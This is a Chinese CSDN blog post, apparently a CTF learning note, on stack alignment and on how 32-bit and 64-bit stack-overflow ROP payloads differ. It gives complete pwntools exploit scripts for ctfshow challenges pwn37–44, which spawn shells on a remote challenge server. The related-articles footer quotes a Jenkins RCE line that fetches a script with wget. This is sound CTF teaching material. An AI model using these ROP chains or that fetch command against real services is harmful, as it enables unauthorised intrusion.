关于pwn64位amd构造payload时的堆栈平衡问题以及32位与64位构造payload的区别与注意事项

已于 2024-01-07 00:24:40 修改
阅读量2.3k 收藏 40
点赞数 37
分类专栏: pwn 文章标签: 安全 网络安全 系统安全 linux 学习方法
于 2023-07-24 20:58:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hu_c_t_f/article/details/131902515
版权

目录

栈堆平衡

参数顺序

参数存放位置

疑问

参考资料

pwn入门,栈溢出漏洞是比较合适的。但我们经常会遇到i386【下面称32位】和amd64【下面称64位】的可执行程序【题目附件】。而32位与64位同样的情况,比如同样是ret2text或ret2syscall时,写的payload是不一样的,但大体的思路是一样的。

本人也是入门pwn的小白,写的不对的地方还请师傅们指出。

栈堆平衡

32位中,没有堆栈平衡一说,而64位中有。payload中的堆栈平衡简单来说,就是要保证payload的字节数是16的倍数。而p64是将地址转为8字节的字符串,所以payload中得保证p64是偶数倍,就能满足堆栈平衡【起初我也没理解,但在群里和其他师傅讨论时,突然悟到了】。因此对于写完payload后还是单数倍的p64时,就需要加单数个【当然加1个就行】p64(ret),【ret代表ret指令的地址,可以直接在IDA里面任意找一个,也可以用ROPgadget来找】,因为ret的多少不会影响到函数的执行逻辑,所以用其来平衡。【9月26日补充,这个平衡还是感觉有点玄学,前几天在打moectf上的某道题时,由于我多加了ret,凑成偶数结果反而没打通,去掉却可以,西电出题的师傅给我推了这篇关于栈对齐博客可以看看,而今天做newstarctf,第一道pwn题,加ret与不加ret都可以打通。。所以我目前是,加ret与不加ret都试试】

找到一个佬关于栈平衡的视频动态调试讲解,通俗易懂:【2024-01-07】pwn技术分享—执行system前为何要执行retn指令_哔哩哔哩_bilibili

 以ctfshow,pwn入门,pwn37,38为例:

# pwn37
from pwn import *
context(arch = 'i386', os = 'linux', log_level = 'debug')
elf = ELF('./pwn37')
io = remote('pwn.challenge.ctf.show', 28184)
# backdoor = elf.sym['backdoor']
backdoor = 0x8048521

payload = cyclic(0x12 + 4) + p32(backdoor)
# payload = 'a'*(0x12 + 4) + p32(backdoor)
io.sendline(payload)
io.recv()   #can remove the process of code show above
io.interactive()
# pwn38
from pwn import *
context(arch = 'amd64',os = 'linux', log_level = 'debug')

io = remote('pwn.challenge.ctf.show', 28155)
elf = ELF('./pwn38')
backdoor = elf.sym['backdoor']

# payload = cyclic(0xa + 8) + p64(0x400772) + p64(backdoor)
# payload = cyclic(0xa + 8) + p64(0x400656) + p64(backdoor)
# payload = cyclic(0xa + 8) + p64(0x40066D) + p64(backdoor)
# payload = cyclic(0xa + 8) + p64(0x4005B9) + p64(backdoor)
payload = cyclic(0xa + 8) + p64(0x4005F9) + p64(backdoor)

io.sendline(payload)
io.interactive()

参数顺序

32位中先写函数,再写参数【参数可能是返回值,如调用system,需要多加个参数作返回值【8月10日更改,做了这么多题,发现32bit的payload中,最后一个函数都需要有返回值】【8月12日补充,又做一些题,进一步明白,每个函数都有返回值,而我们对函数返回值不感兴趣【比如一些函数执行成功会返回1】只需要有个位置充当一下,而之前对于多个函数的解释也进一步得以优化,其应该是需要返回值的,只不过位置正好被其他的东西给占据了,如pop_这些用于给参数位置的rop链给一举两得给占据了,也就是说,即使是最后一个函数有参数,也不用在单独写一个p32(0)来填充返回值的位置,因为pop_已经将这件事给做了 ,例如payload = cyclic(0x2c + 4) + p32(func1) + p32(func2) + p32(pop_ebx) + p32(0xACACACAC) + p32(flag) + p32(pop_ebx) + p32(0xBDBDBDBD)

64位中先写参数,再写函数

以ctfshow,pwn入门,pwn41、42,为例:

# pwn41
from pwn import *

elf = ELF('./pwn41')
io = remote('pwn.challenge.ctf.show', 28139)

system = elf.sym['system']
sh = next(elf.search('sh'))

payload = cyclic(0x12 + 4) + p32(system) + p32(0) + p32(sh)
io.sendline(payload)
io.interactive()

# pwn42
from pwn import *
context(arch = 'amd64', os = 'linux', log_level = 'debug')
# context.log_level = 'debug'
elf = ELF('./pwn42')
io = remote('pwn.challenge.ctf.show', '28155')
# io = process('pwn')
system = elf.sym['system']
sh = next(elf.search('sh'))

pop_rdi_ret = 0x0000000000400843
# ret = 0x000000000040053e
ret = 0x4006D5  # from IDA find any ret 

payload = cyclic(0xa + 8) + p64(pop_rdi_ret) + p64(sh) + p64(ret) + p64(system)
io.sendline(payload)

io.interactive()

参数存放位置

在32位中,参数和返回值直接就存在栈中,但对于payload中有多个函数时,如果不是最后一个函数,则需要将其参数用寄存器来保存【目前我试过的寄存器都可以,只要参数个数和控制到的寄存器一致就行】【8月13日补充,尽管上述想法能让我们正确做出题目,但关于参数的说法还是不太妥当,首先32位中参数是保存在栈上的,而非寄存器上。其次这个理论也不能解释其他的能打通的payload,如下面pwn43这个也能打通:cyclic(0x6c + 4) + p32(gets) + p32(system) + p32(buf2) + p32(buf2),这个则可以通过填充返回值来理解,也确实合理】【但我做题还是会用32位寄存器的思想,直到我有一天题目没打通,那么我会再次回来修改文章】

如ctfshow,pwn入门,pwn43

ROPgadget --binary pwn43 --only 'pop|ret'

# pwn43
from pwn import *

context.log_level = 'debug'
elf = ELF('./pwn43')
# io = remote('pwn.challenge.ctf.show', 28107)
io = process('pwn43')
gets = elf.sym['gets']
system = elf.sym['system']
buf2 = 0x804B060
pop_ebx = 0x08048409
pop_ebp = 0x0804884b
payload = cyclic(0x6c + 4) + p32(gets) + p32(pop_ebx) + p32(buf2) + p32(system) + p32(0) + p32(buf2)
# payload = cyclic(0x6c + 4) + p32(gets) + p32(pop_ebp) + p32(buf2) + p32(system) + p32(0) + p32(buf2)
io.sendline(payload)
io.sendline('/bin/sh')   # can also use 'sh'
# io.recv()
io.interactive()

在64位中,函数参数一律得用寄存器来存储【从上面pwn42也可以看出来】

64位和32位不同,参数不是直接放在栈上,而是优先放在寄存器rdi,rsi,rdx,rcx,r8,r9。这几个寄存器放不下时才会考虑栈。--摘录自:某题wp

如ctfshow,pwn入门,pwn44

ROPgadget --binary pwn44 --only 'pop|ret' 


# pwn44
from pwn import *

context.log_level = 'debug'
elf = ELF('./pwn44')
io = remote('pwn.challenge.ctf.show', 28180)

system = elf.sym['system']
gets = elf.sym['gets']
buf2 = 0x602080
pop_rdi = 0x00000000004007f3
pop_r15 = 0x00000000004007f2 #试过,不行
ret = 0x00000000004004fe
payload = cyclic(0xa + 8) + p64(pop_rdi) + p64(buf2) + p64(gets) + p64(pop_rdi) + p64(buf2)  + p64(system)
io.sendline(payload)
io.sendline('/bin/sh')

io.interactive()

疑问

其次还发现64位中,不用管system的返回值,不知道是不是因为64位中会自动用寄存器存储函数返回值,还是说64位系统中,返回值在函数后,而恰巧有返回值的system函数又在payload最后,所以不用写也可以。。。。。这目前还没研究明白,还请知道的师傅指教

Fxe0_0师傅表示:具体情况具体分析

参考资料

大佬博客

‬‌‌‌‌⁤​‌⁢⁣⁢⁣​⁤‍‌‬⁡‍​‌⁣‌‍​⁣⁢⁣‍⁤⁣⁢⁣⁢‍​‌​​​‍⁡⁢​⁢CTFshow---PWN入门037-072---Write UP - 飞书云文档 (feishu.cn)

j3ff_
关注
  • 37
    点赞
  • 40
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论
专栏目录
pwn程序已经运行了,payload字节数组包含不可见字符,无法进行utf8编码,这个候怎么输入?
键盘的起始页
04-17 946
如果你想要使用 Python 脚本向一个已经运行的程序发送包含不可见字符的 payload,你需要确保你有一种方法来将 Python 脚本的输出重定向到该程序的输入。如果你的程序已经在运行,并且你可以使用 GDB 附加到进程,那么你可以使用 GDB 来修改内存或者调用函数来发送你的 payload。在实践中,如果你没有权限或者无法确定程序的 PID,或者程序不是从标准输入读取数据,你可能需要考虑使用其他的方法(比如 GDB 或者修改程序的运行方式来接受来自特定管道或文件的输入)。目录下的文件描述符来写入。
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
PWN入门(5)32位程序与64位程序和构造ROP链
Ba1_Ma0的博客
09-12 1639
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用。
pwn06(关于64位程序堆栈平衡的处理)
Welcome To Myon'Blog !
07-07 907
堆栈平衡: 当我们在堆栈中进行堆栈的操作的候,一定要保证在RET这条指令之前,ESP指向的是我们压入中的地址,函数执行到ret执行之前,堆栈顶的地址 一定要是call指令的下一个地址。
Pwn入门笔记(三)函数细节
qq_33590156的博客
11-25 2034
细节关于漏洞函数writeprintf关于p64(),u64(),int等转换函数题目中 关于漏洞函数 write write(参数1,参数2,参数3),write有三个参数,参数1是模式,“1”为写模式,参数2在上其实是一个地址,它会将这个地址上存的字符串给打印出来,参数3是打印字符串的长度。 printf 直接进行输出, “%p”,可以输出后面参数的地址 “%20 $p”(无空格),打印出偏移为21得地方的地址 “%20 $n”(无空格),写入%前字符串的长度到偏移为21得地方 "%70d%20 $n
pwn刷题num24----ret2libc + 平衡
tbsqigongzi的博客
04-26 1158
BUUCTF-PWN-ciscn_2019_c_1 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----可能存在溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 运行程序后,有三个选择, 欢迎来到这台加密机 1.加密 2.解密 3.退出 选加密1写入三个aaa,被加密成lll,选解密2,出了一句我认为你能自己解密。。。 ida看一
[pwn] 6.ROP练习
H4ppyD0g的博客
09-01 278
文章目录pwn0pwn1pwn2pwn2_x64pwn3pwn3_x64 pwn0 经典ret2text,不过是64位程序,覆盖ebp需要8个字节。 from pwn import * elf = ELF('./level0') callsys_addr = elf.symbols['callsystem'] io = process('./level0') io.recvuntil(b'World\n') payload = cyclic(0x80 + 0x8) + p64(0x0000000000
BUUCTF ciscn_2019_c_1平衡解释
qq_51904308的博客
05-13 126
BUUCTF ciscn_2019_c_1平衡解释
[PWN]——溢出中32位64位区别
最新发布
ysy___ysy的博客
01-18 525
payload = b'a'*(0x2d+4)+ p32(mprotect_addr)+ p32(pop3_ret_addr) +p32(addr) + p32(0x100)+p32(0x7)】[利用pop3_ret将mprotect函数所需三个参数传递过去]【payload = b'a'*(0xe7+4)+p32(write_plt)+p32(p_main) + p32(1)+p32(write_got)+p32(4)】(调用write函数输出write_got地址)
pwn.rar_made_truckhya_对话框与窗口
09-23
标题"pwn.rar_made_truckhya_对话框与窗口"暗示我们将探讨如何利用VC++(Visual C++)来制作一个涉及对话框和窗口的ActiveX控件。 首先,让我们理解ActiveX控制的核心概念。ActiveX控件是基于COM(Component Object...
pwn_jenkins:有关攻击Jenkins服务器的注意事项
05-12
java -jar ysoserial-master.jar CommonsCollections1 ' wget myip:myport -O /tmp/a.sh ' > payload.out ./jenkins_rce.py jenkins_ip jenkins_port payload.out 身份验证/ ACL绕过(CVE-2018-1000861,Jenkins &lt...
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
pwndra:Ghidra的与pwnCTF相关的实用程序的集合
05-08
彭德拉Ghidra的与pwn / CTF相关的实用程序的集合实用工具替换常量该实用程序将尝试用其人类可读的对等替换函数中的已知常量。注释系统调用该实用程序将尝试查找和识别系统调用(和参数)。 反编译器视图中的注释 ...
pwn入门(1)二进制基础
农夫果园好好喝的博客
06-27 1169
破解、利用成功(程序的二进制漏洞)攻破(设备、服务器)控制(设备、服务器)exploit:用于攻击的脚本与方案payload:攻击载荷,是的目标进程被劫持控制流的数据shellcode:调用攻击目标的shell代码从C源代码到可执行文件的生成过程什么是可执行文件? 局部变量全部存放在中。...
PWN基础之函数调用溢出
weixin_46132162的博客
12-28 1385
在函数调用结束顶的函数(callee)状态被弹出,顶恢复到调用函数(caller)的状态函数调用在内存中从高地址向低地址生长,所以顶对应的内存地址在压变小,退变大。接下来vulnerable_function()函数会调用read()函数,这个候vulnerable_function()函数为主调函数(caller function)read()函数为被调函数(callee function)read()函数 是有参数的,我们来看一看有参数的函数在函数调用是什么样的。
【Web狗自虐系列1】Pwn入门之初级ROP
就这样吧
07-06 927
式一种典型的后进先出的数据结构,其操作主要有压(push)与出(pop)两种操作压与出都是操作的顶高级语言在运行都会被转换为汇编程序,在汇编程序运行过程中,充分利用了这一数据结构。每个程序在运行都有虚拟地址空间,其中某一部分就是该程序对应的,用于保存函数调用信息和局部变量。程序的是从进程地址空间的高地址向低地址增长的。
pwn入门之32位ret2libc
wangxunyu6的博客
01-08 1095
为什么第一个payload发送后能够得到puts_addr,上面说到write函数是关键,看下write函数原型write(1,buf,0x32)和read很像,这里涉及到一个格式化漏洞(这个也是pwn学习中的一大知识点,后续文章再讲),像puts,write,printf等类似函数在书写不规范会导致多输出一些信息,正确写法应该是printf("%5d\n",1000)这种前面加上格式化的,懒的程序员在写代码会直接printf(1000)导致泄露信息。的地址,这个地址就是libc文件的基址。
pwn 做题出现的问题
qq_53086690的博客
05-07 716
看网上的一些exp是'a' * 15 + p64(0x401186)这样写的但是自己运行的候会报错 can only concatenate str (not “bytes”) to str 在网上查了一下是python版本的问题只要在a的前边加上b就可以了b'a' * 15 + p64(0x401186) ...
CTF-浅尝64位溢出PWN
热门推荐
BadRer的博客
06-04 1万+
干了一早上终于把这道’难题’做出来了,实在是不容易。头一次完完全全的做出64位pwn题,如果就溢出来说的话,其实感觉和32位的也差不多。至少这方面没有遇到太大的困难,做64位的题对汇编指令的要求就更高了。正好一边做题,一边多学点汇编。 收获是很大的。正文刚开始被一个逻辑漏洞cmp给卡着,一直没有跳到真正产生漏洞的地方,好不容易跳过去了,结果被我自己坑了(写脚本的候,没有考虑缓冲区的影响,经常
ctf pwn题怎么生成64位的shellcode
03-25
生成64位的shellcode可以使用以下步骤: 1. 编写shellcode,使用64位汇编语言(如nasm)来写。 2. 使用工具将汇编代码转换为机器码。可以使用以下命令: 64位Linux:nasm -f elf64 -o shellcode.o shellcode.asm && ld -o shellcode shellcode.o 64位Windows:nasm -f win64 -o shellcode.obj shellcode.asm && ld -o shellcode.exe shellcode.obj 3. 将机器码转换为十六进制字符串。可以使用以下命令: 64位Linux:objdump -d shellcode | grep '^ ' | cut -f2 | perl -pe 's/(\S{2})/\\x\1/g' 64位Windows:将机器码从shellcode.exe文件中提取,然后使用在线工具转换为十六进制字符串。 4. 将生成的十六进制字符串作为shellcode的一部分,以便在pwn题中使用。 需要注意的是,在编写64位shellcode,需要考虑到64位CPU的特点,如使用RAX寄存器来传递参数,使用SYSV调用约定等。同,在编写任何shellcode,都需要保证代码的可靠性和安全性,以避免对系统造成损害。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

j3ff_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值